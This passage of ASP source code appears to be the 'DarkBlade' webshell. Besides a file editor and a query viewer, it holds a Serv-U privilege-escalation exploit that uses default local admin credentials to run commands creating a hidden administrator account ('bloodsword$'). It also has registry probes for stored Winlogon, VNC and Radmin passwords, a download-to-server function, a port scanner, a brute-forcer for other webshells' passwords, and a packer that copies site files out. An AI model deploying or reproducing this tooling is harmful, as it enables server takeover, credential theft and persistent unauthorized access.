rs.AbsolutePage=intPage End If If rs.Fields.Count > 0 Then echo"<table width='100%' cellspacing='0' border='0' style='border-width:0px;border-collapse:collapse;'>" doTr 1 For j=0 To rs.Fields.Count-1 doTdNoWrap htmlEnc(rs.Fields(j).Name) Next doTtr trId=0 For i=1 To rs.PageSize If rs.Eof Then Exit For doTr trId For j=0 To rs.Fields.Count-1 doTdNoWrap htmlEnc(rs(j)) Next doTtr trIdAdd rs.MoveNext Next End If doTr trId pageNum=rs.RecordCount/sqlPageSize If InStr(pageNum,".")>0 Then pageNum=Int(pageNum)+1 echo"<td colspan="&rs.Fields.Count&">" echoLine rs.RecordCount&" records in total,page "&pageNum doSqlHref "showQuery","","",strTable,"1","«",htmlEnc(" ") tmpQueryStr="" If strTable=""Then tmpQueryStr=Replace(queryStr,"'","\'") For i=1 To pageNum If i=intPage Then echo htmlEnc(" "&i&" ") Else echo htmlEnc(" ") doSqlHref "showQuery","",tmpQueryStr,strTable,i,i,htmlEnc(" ") End If Next echo htmlEnc(" ") doSqlHref "showQuery","",tmpQueryStr,strTable,pageNum,"»","" echo"</td>" doTtr doTtable rs.Close Else Set rs=conn.Execute(queryStr,-1,&H0001) dieErr(Err) If rs.Fields.Count>0 Then doTable"100%" doTr 1 For i=0 To rs.Fields.Count-1 doTdNoWrap htmlEnc(rs.Fields(i).Name) Next doTtr trId=0 Do Until rs.EOF doTr trId For i=0 To rs.Fields.Count-1 doTdNoWrap htmlEnc(rs(i)) Next doTtr rs.MoveNext trIdAdd Loop doTtable rs.Close Else errMsgAdd"Query got null recordSet." End If Set rs=Nothing Set Cat=Nothing End If chkerr(Err) End Sub Sub CreateConn(connStr) If Not isDebugMode Then On Error Resume Next Set conn=CreateObj("Adodb.Connection") conn.Open connStr dieErr(Err) End Sub Sub DestoryConn() If Not isDebugMode Then On Error Resume Next If IsObject(conn)Then conn.Close Set conn=Nothing End If End Sub Function GetDataType(flag) Dim str Select Case flag Case 0: str="EMPTY" Case 2: str="SMALLINT" Case 3: str="INTEGER" Case 4: str="SINGLE" Case 5: str="DOUBLE" Case 6: str="CURRENCY" Case 7: str="DATE" Case 8: str="BSTR" Case 9: str="IDISPATCH" Case 10: str="ERROR" Case 11: str="BIT" Case 12: str="VARIANT" Case 13: str="IUNKNOWN" Case 14: str="DECIMAL" Case 16: str="TINYINT" Case 17: str="UNSIGNEDTINYINT" Case 18: str="UNSIGNEDSMALLINT" Case 19: str="UNSIGNEDINT" Case 20: str="BIGINT" Case 21: str="UNSIGNEDBIGINT" Case 72: str="GUID" Case 128: str="BINARY" Case 129: str="CHAR" Case 130: str="VARCHAR" Case 131: str="NUMERIC" Case 132: str="USERDEFINED" Case 133: str="DBDATE" Case 134: str="DBTIME" Case 135: str="DBTIMESTAMP" Case 136: str="CHAPTER" Case 200: str="WCHAR" Case 201: str="TEXT" Case 202: str="NVARCHAR" Case 203: str="NTEXT" Case 204: str="VARBINARY" Case 205: str="LONGVARBINARY" Case Else: str=flag End Select GetDataType=str End Function Sub showEdit() If Not isDebugMode Then On Error Resume Next Dim theFile,strContent,parPath,tmputf If Right(thePath,1)="\"Then errMsgAdd"Can't edit a directory!" doFin End If parPath=getLeft(thePath,"\",False) doForm True If goaction="FsoFileExplorer"And subAct="showEdit" Then strContent=FsoRead(thePath) Else strContent=streamLoadFromFile(thePath) End If chkerr(Err) doTextarea"fileContent",strContent,"100%","25","" If subAct="utfEdit" Then doHidden"subAct","utfSave" Else doHidden"subAct","save" End If echo"Save as :" doInput"text","thePath",thePath,"60","" echo" Encode:" doSelect"act","80px","onchange=""javascript:if(this.value!=''){dosubmit('"&goaction&"',this.value,'"&doPathFormat(thePath)&"');}""" doOption"showEdit","Default" tmputf="<option value=""utfEdit"" {$}>Utf-8</option>" If subAct="utfEdit" Then tmputf=Replace(tmputf,"{$}","selected") End If echo tmputf doSselect echo" " doSubmit"Save" echo" " doInput"reSet","","ReSet","","" echo" " doInput"button","clear","Clear","","onClick=""javascript:this.form.fileContent.innerText=''""" echo" " doInput"button","","Go back","","onClick=""javascript:dosubmit('"&goaction&"','','"&doPathFormat(parPath)&"')""" doFform chkerr(Err) doFin End Sub Sub saveFile() If Not isDebugMode Then On Error Resume Next If goaction="FsoFileExplorer"And subAct="save" Then fsoSaveToFile thePath,fileContent Else streamSaveToFile thePath,fileContent,2 End If If Err Then chkerr(Err) Else errMsgAdd"File saved." End If End Sub Sub PageAddToMdb() If Not isDebugMode Then On Error Resume Next Server.ScriptTimeOut=5000 If thePath=""Then thePath=pubPam If thePath=""Then thePath=aspPath If mdbPath=""Then mdbPath=mapath("DarkBlade.mdb") If packMethod=""Then packMethod="fso" showTitle"File Packer/Unpacker" echo"<center>" doTable"100%" doTr 1 doForm True doTd"File Pack","10%" doTdInput"text","thePath",thePath,"30%","","" echoLine"<td style=""width:50%;"">" doSelect"subAct","80px","" doOption"fsoPack","FSO" doOption"appPack","UnFSO" doSselect echo" Pack as : " doInput"text","mdbPath",mdbPath,40,"" echo"</td>" doTdSubmit"Pack","10%" doTtr doTr 0 doTd"Exceptional folder","" doTdInput"text","outPath",outPath,"30%","","" echo"<td colspan=""2"">" echo"Exceptional file type,split with | " doInput"text","outExt",outExt,40,"" echo"</td></tr>" doTtable doFform echo"<hr>" doTable"100%" doTr 1 doForm True doHidden"subAct","unpa" doTd"Release to","10%" doTdInput"text","thePath",thePath,"30%","","" echoLine"<td> Mdb path : " doInput"text","mdbPath",mdbPath,40,"" echo"</td>" doTdSubmit"Unpack","10%" doFform doTtr doTtable echo"</center>" echo"<hr>Notice: Unpacking need FSO object,all files unpacked will be under target folder,replacing same named!" Select Case subAct Case"fsoPack" AddToMdb"fso" Case"appPack" AddToMdb"app" Case"unpa" doUnPack() End Select End Sub Sub AddToMdb(packMethod) If Not isDebugMode Then On Error Resume Next Dim rs,connStr,adoCatalog Set rs=CreateObj("ADODB.RecordSet") Set objStream=CreateObj("adodb.stream") Set adoCatalog=CreateObj("ADOX.Catalog") If InStr(mdbPath,":\")<1 Then mdbPath=mapath(mdbPath) mdbName=getRight(mdbPath,"\") connStr=getJetStr(mdbPath) adoCatalog.Create connStr CreateConn(connStr) conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED,strPath VarChar,binContent Image)") dieErr Err objStream.Open objStream.Type=1 rs.Open"FileData",conn,3,3 mdbName=Lcase(mdbName) mdbName2=Replace(mdbName,".mdb",".ldb") If packMethod="fso"Then fsoTreeForMdb thePath,thePath,rs,objStream Else saTreeForMdb thePath,thePath,rs,objStream End If rs.Close DestoryConn objStream.Close Set rs=Nothing Set objStream=Nothing Set adoCatalog=Nothing If Err Then chkerr(Err) Else errMsgAdd"Packing completed" End If End Sub Sub fsoTreeForMdb(thePath,subPath,rs,objStream) If Not isDebugMode Then On Error Resume Next Dim item,theFolder,objFolder,files If Not(objFso.FolderExists(subPath))Then errMsgAdd"Folder dosen't exists or access denied!" doFin End If outPath=Lcase(outPath) Set theFolder=objFso.GetFolder(subPath) For Each item In theFolder.Files If Not(regTest(getRight(item.name,"."),"^("&outExt&")$") Or Lcase(item.Name)=mdbName Or Lcase(item.Name)=mdbName2)Then rs.AddNew rs("strPath")=Replace(item.Path,thePath&"\","") objStream.LoadFromFile(item.Path) rs("binContent")=objStream.Read() rs.Update End If Next For Each item In theFolder.SubFolders If Not regTest(item.name,"^("&outPath&")$")Then fsoTreeForMdb thePath,item.Path,rs,objStream End If Next Set files=Nothing Set objFolder=Nothing Set theFolder=Nothing End Sub Sub saTreeForMdb(thePath,subPath,rs,objStream) If Not isDebugMode Then On Error Resume Next Dim item,theFolder,sysFileList Set theFolder=objSa.NameSpace(subPath) For Each item In theFolder.Items If Not item.IsFolder And Lcase(item.Name)<>mdbName And Lcase(item.Name)<>mdbName2 And Not(regTest(getRight(item.name,"."),"^("&outExt&")$")) Then rs.AddNew rs("strPath")=Replace(item.Path,thePath&"\","") objStream.LoadFromFile(item.Path) rs("binContent")=objStream.Read() rs.Update End If Next For Each item In theFolder.Items If item.IsFolder And Not regTest(item.name,"^("&outPath&")$") Then saTreeForMdb thePath,item.Path,rs,objStream End If Next Set theFolder=Nothing End Sub Sub doUnPack() If Not isDebugMode Then On Error Resume Next Server.ScriptTimeOut=5000 Dim rs,str,theFolder thePath=thePath thePath=Replace(thePath,"\\","\") If InStr(mdbPath,":\")<1 Then mdbPath=mapath(mdbPath) Set rs=CreateObj("ADODB.RecordSet") Set objStream=CreateObj("adodb.stream") connStr=getJetStr(mdbPath) CreateConn(connStr) rs.Open"FileData",conn,1,1 dieErr Err objStream.Open objStream.Type=1 Do Until rs.Eof If InStr(rs("strPath"),"\")>0 Then theFolder=thePath&"\"&getLeft(rs("strPath"),"\",False) Else theFolder=thePath End If If Not objFso.FolderExists(theFolder)Then objFso.CreateFolder(theFolder) End If objStream.SetEos() objStream.Write rs("binContent") objStream.SaveToFile thePath&"\"&rs("strPath"),2 rs.MoveNext Loop rs.Close DestoryConn objStream.Close Set rs=Nothing Set objStream=Nothing If Err Then chkerr(Err) Else errMsgAdd"Unpacking completed" End If End Sub Sub PageTxtSearcher() If Not isDebugMode Then On Error Resume Next Server.ScriptTimeOut=5000 Dim theFolder showTitle("Text File Searcher/Replacer") If thePath=""Then thePath=rootPath End If doForm True doTable"100%" doTr 1 doTd"Keyword","20%" doTdText"searchkey",searchkey,4 echo"<td>" doSelect"subAct","80px","" doOption"fsoSearch","FSO" doOption"saSearch","UnFSO" doSselect echo"<br>" doChkBox"useReg",1," Regexp","" echoLine"</td>" doTtr doTr 0 doTd"Replace as","" doTdText"strReplaceTo",strReplaceTo,4 echo"<td>" doChkBox"needReplace",1," Replace","" echoLine"</td>" doTtr doTr 1 doTd"Path","" doTdInput"text","thePath",thePath,"","","" echo"<td>" doInput"radio","searchType","filename","","" echo"File name " doInput"radio","searchType","fileContent","","checked" echo"File content" echo"</td>" doTtr doTr 0 doTd"Search type","" doTdInput"text","searchExt",textExt,"","","" doTdSubmit"Search","" doTtr doTtable If searchkey<>""Then echo"<hr>" doUl If subAct="fsoSearch"Then Set theFolder=objFso.GetFolder(thePath) Call searchFolder(theFolder,searchkey) Set theFolder=Nothing ElseIf subAct="saSearch"Then Call appSearchIt(thePath,searchkey) End If echo"</ul>" End If If Err Then chkerr(Err) Else errMsgAdd"Search completed" End If doFin End Sub Sub searchFolder(folder,str) Dim ext,title,theFile,theFolder,needReg needReg=False If useReg=1 Then needReg=True For Each theFile In folder.Files ext=Lcase(getRight(theFile.Name,".")) If searchType="filename"Then If needReg And regTest(theFile.Name,str)Then dofileLink theFile.Path,"fso" ElseIf InStr(1,theFile.Name,str,1) > 0 Then dofileLink theFile.Path,"fso" End If Else If regTest(ext,"^("&searchExt&")$")Then If searchFile(theFile.Path,str,"fso",needReg) Then dofileLink theFile.Path,"fso" End If End If End If Next For Each theFolder In folder.subFolders searchFolder theFolder,str Next chkerr(Err) End Sub Function searchFile(sPath,s,method,needReg) If Not isDebugMode Then On Error Resume Next Dim theFile,content,find find=False If method="fso" Then content=fsoRead(sPath) Else content=streamLoadFromFile(sPath) End If If Err Then chkerr(Err) searchFile=False Exit Function End If If needReg Then find=regTest(content,s) ElseIf InStr(1,content,s,1)>0 Then find=True End If If needReplace Then If needReg Then content=regReplace(content,s,strReplaceTo,False) Else content=Replace(content,s,strReplaceTo,1,-1,1) End If If method="fso" Then fsoSaveToFile sPath,content Else streamSaveToFile sPath,content,2 End If End If searchFile=find chkerr(Err) End Function Sub appSearchIt(thePath,theKey) If Not isDebugMode Then On Error Resume Next Dim title,ext,objFolder,objItem,fileName,needReg needReg=False If useReg=1 Then needReg=True Set objFolder=objSa.NameSpace(thePath) For Each objItem In objFolder.Items If objItem.IsFolder Then Call appSearchIt(objItem.Path,theKey) Else ext=Lcase(getRight(objItem.Path,".")) fileName=getRight(objItem.Path,"\") If searchType="filename"Then If needReg And regTest(fileName,str)Then dofileLink theFile.Path,"app" ElseIf InStr(Lcase(fileName),Lcase(str)) > 0 Then dofileLink theFile.Path,"app" End If Else If regTest(subExt,"^("&searchExt&")$")Then If searchFile(objItem.Path,theKey,"app",needReg) Then doFileLink objItem.Path,"app" End If End If End If End If Next chkerr(Err) End Sub Sub doFileLink(sPath,typpe) Dim strAction If typpe="fso"Then strAction="FsoFileExplorer" Else strAction="SaFileExplorer" End If echo"<li><u>"&sPath&"</u>" doSubHref strAction,"showEdit",doPathFormat(sPath),"Edit","" Response.Flush() End Sub Sub PageServUp() If Not isDebugMode Then On Error Resume Next Dim ftpDomain ftpDomain="darkblade" loginuser="User "&suUser&vbCrLf loginpass="Pass "&suPass&vbCrLf deldomain="-DELETEDOMAIN"&vbCrLf&"-IP=0.0.0.0"&vbCrLf&" PortNo="&nport&vbCrLf mt="SITE MAINTENANCE"&vbCrLf newdomain="-SetDOMAIN"&vbCrLf&"-Domain="&ftpDomain&"|0.0.0.0|"&nport&"|-1|1|0"&vbCrLf&"-TZOEnable=0"&vbCrLf&" TZOKey="&vbCrLf newuser="-SetUSERSetUP"&vbCrLf&"-IP=0.0.0.0"&vbCrLf&"-PortNo="&nport&vbCrLf&"-User="&nuser&vbCrLf&"-Password="&npass&vbCrLf&_ "-HomeDir="&Gpath()&"\\"&vbCrLf&"-LoginMesFile="&vbCrLf&"-Disable=0"&vbCrLf&"-RelPaths=1"&vbCrLf&_ "-NeedSecure=0"&vbCrLf&"-HideHidden=0"&vbCrLf&"-AlwaysAllowLogin=0"&vbCrLf&"-ChangePassword=0"&vbCrLf&_ "-QuotaEnable=0"&vbCrLf&"-MaxUsersLoginPerIP=-1"&vbCrLf&"-SpeedLimitUp=0"&vbCrLf&"-SpeedLimitDown=0"&vbCrLf&_ "-MaxNrUsers=-1"&vbCrLf&"-IdleTimeOut=600"&vbCrLf&"-SessionTimeOut=-1"&vbCrLf&"-Expire=0"&vbCrLf&"-RatioUp=1"&vbCrLf&_ "-RatioDown=1"&vbCrLf&"-RatiosCredit=0"&vbCrLf&"-QuotaCurrent=0"&vbCrLf&"-QuotaMaximum=0"&vbCrLf&_ "-Maintenance=System"&vbCrLf&"-PasswordType=Regular"&vbCrLf&"-Ratios=None"&vbCrLf&" Access="&Gpath()&"\\|RWAMELCDP"&vbCrLf suquit="QUIT"&vbCrLf showTitle("Serv-U FTP Exp") Select Case subAct Case "1" doSuStep1 Case "2" doSuStep2 Case "3" doSuStep3 Case "4" doSuForm2 Case "5" doSuForm3 Case Else If IsObject(Session("a"))Then Session("a").abort If IsObject(Session("b"))Then Session("b").abort If IsObject(Session("c"))Then Session("c").abort Set Session("a")=Nothing Set Session("b")=Nothing Set Session("c")=Nothing doForm True doHidden "subAct",1 echo"<center><b>Add Temp Domain</b><br>" doTable "80%" doTr 1 doTd"Local user","20%" doTdInput"text","suUser","LocalAdministrator","30%","","" doTd"Local pass","20%" doTdInput"text","suPass","#l@$ak#.lk;0@P","30%","","" doTtr doTr 0 doTd" Local port","" doTdInput"text","suPort","43958","","","" doTd"Sys drive","" doTdInput"text","suPath",Gpath(),"","","" doTtr doTr 1 doTd"New user","" doTdInput"text","nuser","go","","","" doTd"New pass","" doTdInput"text","npass","od","","","" doTtr doTr 0 doTd"New port","" doTdInput"text","nport","60000","","","" echo"<td>" doSubmit"Go" echo"</td><td>" doInput"reSet","","ReSet","","" echo"</td></tr>" doTtable echo"</center>" doFform End Select echo"<hr>" echo"<center>" doTable "80%" doTr 1 echo"<td>" doSubHref goaction,"","","Add domain","" echo"</td>" echo"<td>" doSubHref goaction,4,"","Exec cmd","" echo"</td>" echo"<td>" doSubHref goaction,5,"","Clean domain","" echo"</td>" doTtr doTtable echo"</center>" doFin End Sub Sub doSuStep1() If Not isDebugMode Then On Error Resume Next Set a=CreateObj("Microsoft.XMLHTTP") a.open"GET","http://127.0.0.1:"&suPort&"/goldsun/upadmin/s1",True,"","" a.send loginuser&loginpass&mt&deldomain&newdomain&newuser&suquit Set Session("a")=a errMsgAdd"Connecting 127.0.0.1:"&suPort&" using "&suUser&",pass:"&suPass&"..." doSuForm2 End Sub Sub doSuStep2() If Not isDebugMode Then On Error Resume Next doSuForm2() Set b=CreateObj("Microsoft.XMLHTTP") b.open"GET","http://"&getServerVariable("LOCAL_ADDR")&":"&nport&"/goldsun/upadmin/s2",False,"","" b.send"User "&nuser&vbCrLf&"pass "&npass&vbCrLf&"site exec "&suCmd&vbCrLf&suquit Set Session("b")=b errMsgAdd"Executing command..." echoLine"<hr><center><div class='alt1Span' style='width:80%;text-align:left'><br>" echoLine Replace(b.ResponseText,chr(10),"<br>")&"</div></center>" End Sub Sub doSuStep3() If Not isDebugMode Then On Error Resume Next Set c=CreateObj("Microsoft.XMLHTTP") c.open "GET","http://127.0.0.1:"&suPort&"/goldsun/upadmin/s3",True,"","" c.send loginuser&loginpass&mt&deldomain&suquit Set Session("c")=c errMsgAdd"Temp domain deleted!" echo"<script language='javascript'>setTimeout(""dosubmit('"&goaction&"','','')"",""3000"");</script>" End Sub Function Gpath() If Not isDebugMode Then On Error Resume Next Gpath=Lcase(Left(objFso.GetSpecialFolder(0),2)) If Gpath=""Then Gpath="c:" End Function Sub doSuForm2() If nuser=""Then nuser="go" If npass=""Then npass="od" If nport=""Then nport="60000" doForm True doHidden "subAct",2 echo"<center><b>Execute Cmd</b><br>" doTable "80%" doTr 1 doTd"Command","" doTdInput"text","suCmd","cmd /c net user bloodsword$ 0kee /add & net localgroup administrators bloodsword$ /add","","",3 doTtr doTr 0 doTd"Ftp user","" doTdInput"text","nuser",nuser,"","","" doTd"Ftp pass","" doTdInput"text","npass",npass,"","","" doTtr doTr 1 doTd"Ftp port","" doTdInput"text","nport",nport,"","","" echo"<td>" doSubmit"Go" echo"</td><td>" doInput"reSet","","ReSet","","" echo"</td></tr>" doTtable echo"</center>" doFform End Sub Sub doSuForm3() doForm True doHidden "subAct",3 echo"<center><b>Clean Temp Domain</b><br>" doTable "80%" doTr 1 doTd"Local user","20%" doTdInput"text","suUser","LocalAdministrator","30%","","" doTd"Local pass","20%" doTdInput"text","suPass","#l@$ak#.lk;0@P","30%","","" doTtr doTr 0 doTd"Local port","" doTdInput"text","suPort","43958","","","" doTd"Temp domain port","" doTdInput"text","nport","60000","","","" doTtr doTr 1 echo"<td>" doSubmit"Go" echo"</td><td colspan='3'>" doInput"reSet","","ReSet","","" echo"</td></tr>" doTtable echo"</center>" doFform End Sub Sub PageScan() If Not isDebugMode Then On Error Resume Next Dim theFolder showTitle"Asp Webshell Scanner" echo"Path : " doForm True doInput"text","thePath","/",50,"" echo" " doSubmit"Scan" doChkBox"getInc",1," Get include files","" If thePath<>""Then If InStr(thePath,":\")<1 Then thePath=mapath(thePath) echo"<hr>" Response.Flush() doUl Set theFolder=objFso.GetFolder(thePath) doScan(theFolder) Set theFolder=Nothing echo"</ul>" End If doFin End Sub Sub doScan(theFolder) If Not isDebugMode Then On Error Resume Next Server.ScriptTimeOut=5000 Dim shellObjLst,funcLst,ext,objName,funcs,needScan,strInclude,theFile,content,echoed shellObjLst="Wscript.Shell|Wscript.Shell.1|Shell.Application|Shell.Application.1|clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8|clsid:13709620-C279-11CE-A49E-444553540000" funcLst="Wscript.Shell;Run,Exec,RegRead|Shell.Application;ShellExecute|Scripting.FileSystemObject;CreateTextFile,OpenTextFile,SavetoFile" For Each objFile In theFolder.Files echoed=False needScan=False ext=Lcase(getRight(objFile.Name,".")) If regTest(ext,"^("&aspExt&")$") Then content=fsoRead(objFile.Path) strInclude="" For Each strObj In Split(shellObjLst,"|") If InStr(1,content,strObj,1)>0 Then doScanReport objFile,"Object with risk : <font color=""red"">"&strObj&"</font>" echoed=True End If Next For Each strFunc In Split(funcLst,"|") objName=getLeft(strFunc,";",True) funcs=getRight(strFunc,";") For Each subFunc In Split(funcs,",") If regTest(content,"\."&subFunc&"\b") Then doScanReport objFile,"Called object <font color=""red"">"&objName&"'s "&subFunc&"</font> Function" echoed=True End If Next Next If regTest(content,"Set\s*.*\s*=\s*server\s")Then doScanReport objFile,"Found Set xxx=Server" echoed=True End If If regTest(content,"server.(execute|Transfer)([ \t]*|\()[^""]\)")Then doScanReport objFile,"Found <font color=""red"">Server.Execute / Transfer()</font> Function" echoed=True End If If regTest(content,"\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript)\.encode\b")Then doScanReport objFile,"<font color=""red"">Script encrypted</font>" echoed=True End If If regTest(content,"<script\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>")Then doScanReport objFile,"Found <font color=""red"">"&htmlEnc("<script runat=""server"">")&"</font>" echoed=True End If If regTest(content,"[^\.]\bExecute\b")Then doScanReport objFile,"Found <font color=""red"">Execute()</font> Function" echoed=True End If If regTest(content,"[^\.]\bExecuteGlobal\b")Then doScanReport objFile,"Found <font color=""red"">ExecuteGlobal()</font> Function" echoed=True End If If getInc=1 Then strInclude=regExecute(content,"<!--\s*#include\s+(file|virtual)\s*=\s*.*-->",False)(0) If strInclude<>""Then strInclude=regExecute(strInclude,"[/\w]+\.[\w]+",False)(0) If strInclude=""Then doScanReport objFile,"Can't get include file" echoed=True Else doScanReport objFile,"Included file <font color=""blue"">"&strInclude&"</font>" echoed=True End If End If End If If echoed Then echo"<hr>" Response.Flush() End If Next For Each objFolder In theFolder.SubFolders doScan(objFolder) Next chkerr(Err) End Sub Sub doScanReport(objFile,plus) echoLine"<li><u>" doSubHref "FsoFileExplorer","showEdit",doPathFormat(objFile.Path),objFile.Path,"" echoLine"</u><font color=#9900FF>"&objFile.DateLastModIfied&"</font>-<font color=#009966>"&getTheSize(objFile.size)&"</font>-"&plus&"</li>" Response.Flush() End Sub Sub PageOtherTools() If Not isDebugMode Then On Error Resume Next If thePath=""Then thePath=aspPath Dim commPath,regPaths regPaths=regPath commPath=chkPath If regPaths=""Then regPaths=Replace("HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword|HKLM\SYSTEM\CurrentControlSet\Services\Serv-U-Counters\Performance\Library|HKLM\SYSTEM\CurrentControlSet\Services\Serv-U\ImagePath|HKLM\SOFTWARE\Cat Soft\Serv-U\Domains\DomainList\DomainList|HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter|HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port|HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuThenabled|HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp|HKLM\SYSTEM\RAdmin\v2.0\Server\iplist\0|HKLM\SOFTWARE\ORL\WinVNC3\default\Password|HKLM\SOFTWARE\RealVNC\WinVNC4\Password|HKLM\SOFTWARE\hzhost\config\Settings\mysqlpass|HKLM\software\hzhost\config\Settings\mastersvrpass|HKLM\software\hzhost\config\Settings\sysdbpss","|",Chr(13)&Chr(10)) If commPath=""Then commPath=Replace("x:\|x:\Program Files|x:\Program Files\Serv-u|x:\Program Files\RhinoSoft.com|x:\Program Files\Radmin|x:\Program Files\Mysql|x:\Program Files\mail|x:\Program Files\winwebmail|x:\Documents and Settings\All Users|x:\Documents and Settings\All Users\Documents|x:\Documents and Settings\All Users\Start Menu\Programs|x:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere|x:\Serv-U|x:\Radmin|x:\Mysql|x:\mail|x:\winwebmail|x:\soft|x:\tools|x:\windows\temp","|",Chr(13)&Chr(10)) showTitle"Action Others" doForm True doHidden"subAct","downToServer" echoLine"<b>Download to server</b><br>" doTable"100%" doTr 1 doTdInput"text","targetUrl","http://","80%","","" doTdSubmit"Download","20%" doTtr doTr 0 doTdInput"text","thePath",thePath,"","","" echo"<td>" doChkBox"overWri",2,"Overwrite","" doTtr doTtable doFform echo"<hr>" doForm True doHidden"subAct","scanPort" echoLine"<b>Port scan</b><br>" doTable"100%" doTr 1 doTd"Scan IP","20%" doTdInput"text","ipList","127.0.0.1","60%","","" doTdSubmit"Scan","20%" doTtr doTr 0 doTd"Port List","20%" doTdInput"text","portList","21,23,80,1433,1521,3306,3389,4899,43958,65500","80%","",2 doTtr doTtable doFform echo"<hr>" doForm True doHidden"subAct","crackShell" echoLine"<b>Mini shell crack</b><br>" doTable"100%" doTr 1 doTd"Url","20%" doTdInput"text","targetUrl","http://","60%","","" doTdSubmit"Start","20%" doTtr doTr 0 doTd"Dic","20%" doTdInput"text","dicList","value,cmd,admin,fuck,123456,#,|,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,~,!,@,*,$,1,2,3,4,5,6,7,8,9,0","","","" echo"<td>" doSelect"shellenv","60px","" doOption"asp","asp" doOption"php","php" doSselect echo"</td>" doTtr doTtable doFform echo"<hr>" doForm True doHidden"subAct","chkFolder" echoLine"<b>Common path probe</b><br>" doTable"100%" doTr 1 doTdText"chkPath",commPath,6 doTdSubmit"Start","20%" doTtr doTtable doFform echo"<hr>" doForm True doTable"100%" doHidden"subAct","chkReg" echoLine"<b>Registry probe</b><br>" doTable"100%" doTr 1 doTdText"regPath",regPaths,6 doTdSubmit"Start","20%" doTtr doTtable doFform echo"<hr>" Select Case subAct Case"downToServer" echo"<hr>" doDownToServer() Case"chkReg" echo"<hr>" doChkReg() Case"scanPort" echo"<hr>" doScanPort() Case"crackShell" echo"<hr>" doCrackShell() Case"chkFolder" echo"<hr>" doChkFolder() End Select End Sub Sub doDownToServer() If Not isDebugMode Then On Error Resume Next Dim reFileName,tmpContent Set objStream=CreateObj("Adodb.Stream") reFileName=getRight(targetUrl,"/") If InStr(thePath,".")<1 Then thePath=thePath&"\"&reFileName objXml.Open"GET",targetUrl,False objXml.send dieErr(Err) If overWri<>2 Then overWri=1 End If With objStream .Type=1 .Mode=3 .Open .Write objXml.ResponseBody .Position=0 objStream.SavetoFile thePath,overWri .Close End With If Err Then chkerr(Err) Else echo"Download succeeded" End If End Sub Sub doChkReg() If Not isDebugMode Then On Error Resume Next Dim RegResult echo"Registry key detected will be shown below:<br>" doTable "100%" trId=1 doTh doTd"<b>Key</b>","" doTd"<b>Value</b>","" doTtr For Each subPath In Split(regPath,Chr(13)&Chr(10)) RegResult=ReadReg(subPath) If RegResult<>"" Then doTr trId doTd subPath,"" doTd RegResult,"" doTtr trIdAdd End If Next doTtable End Sub Function ReadReg(rpath) Dim regArray,regResult If Not isDebugMode Then On Error Resume Next regArray=objWs.RegRead(rpath) If IsArray(regArray)Then regResult="" For i=0 To UBound(regArray) If IsNumeric(regArray(i))Then If CInt(regArray(i))<16 Then RegResult=RegResult&"0" End If regResult=RegResult&CStr(Hex(CInt(regArray(i)))) Else regResult=RegResult®Array(i) End If Next ReadReg=regResult Else ReadReg=regArray End If End Function Sub doScanPort() If Not isDebugMode Then On Error Resume Next If Not regTest(ipList,"^((\d{1,3}\.){3}(\d{1,3}),)*(\d{1,3}\.){3}(\d{1,3})$")Then echo "Invalid IP format" doFin End If If Not regTest(portList,"^(\d{1,5},)*\d{1,5}$")Then echo "Invalid port format" doFin End If echo "Scanning...<br>" Response.Flush() For Each tmpip In Split(ipList,",") For Each tmpPort In Split(portList,",") doPortScan tmpip,tmpPort Next Next End Sub Sub doPortScan(targetip,portNum) On Error Resume Next Dim conn,connstr Set conn=CreateObj("ADODB.connection") connstr="Provider=SQLOLEDB.1;Data Source="&targetip&","&portNum&";User ID=lake2;Password=lake2;" conn.ConnectionTimeout=1 conn.open connstr If Err Then If Err.number=-2147217843 or Err.number=-2147467259 Then If InStr(Err.description,"(Connect()).")>0 Then echo"<label>"&targetip&":"&portNum&"</label><label>close</label><br>" Else echo"<label>"&targetip&":"&portNum&"</label><label><font color=red>open</font></label><br>" End If Response.Flush() End If End If End Sub Sub doCrackShell() If Not isDebugMode Then On Error Resume Next echo"Cracking...<br>" Response.Flush() For Each strPass In Split(dicList,",") If shellenv="asp"Then strpam=UrlEnc(strPass)&"="&UrlEnc("response.write 98611") Else strpam=UrlEnc(strPass)&"="&UrlEnc("echo 98611;") End If If InStr(xmlGet(targetUrl&"?"&strpam,"POST"),"98611")>0 Then echo"Password is <font color=red>"&strPass&"</font> ^_^" doFin End If Next echo"Crack failed,RPWT?" chkerr(Err) End Sub Sub doChkFolder() If Not isDebugMode Then On Error Resume Next Dim subChkPath,spanId echo"Path detected will be shown below:<br>" chkPath=Replace(chkPath,"x:\","") spanId=1 For Each drive In objFso.Drives For Each subPath In Split(chkPath,Chr(13)&Chr(10)) subChkPath=drive.DriveLetter&":\"&subPath If objFso.FolderExists(subChkPath)Then doSpan spanId doSubHref "FsoFileExplorer","",doPathFormat(subChkPath),subChkPath,"" echo"</span>" spanId=spanId+1 If spanId=2 Then spanId=0 rsTable.MoveNext Response.Flush() End If Next Next chkErr(Err) End Sub Sub PagedoLogout() Response.Cookies(cookiePass)="" Response.Redirect(pagePath&"?goaction="&showLogin) End Sub Sub showTitle(strTitle) %> <html> <head> <title><%=sversion%></title> <style type="text/css"> body,td{font: 12px Arial,Tahoma;line-height: 16px;} .main{width:100%;padding:20px 20px 20px 20px;} .hidehref{font:12px Arial,Tahoma;color:#646464;} .showhref{font:12px Arial,Tahoma;color:#0099FF;} .input{font:12px Arial,Tahoma;background:#fff;height:20px;BORDER-WIDTH:1px;} .text{font:12px Arial,Tahoma;background:#fff;padding:1px;BORDER-WIDTH:1px;} .tdInput{font:12px Arial,Tahoma;background:#fff;padding:1px;height:20px;width:100%;BORDER-WIDTH:1px;} .tdText{font:12px 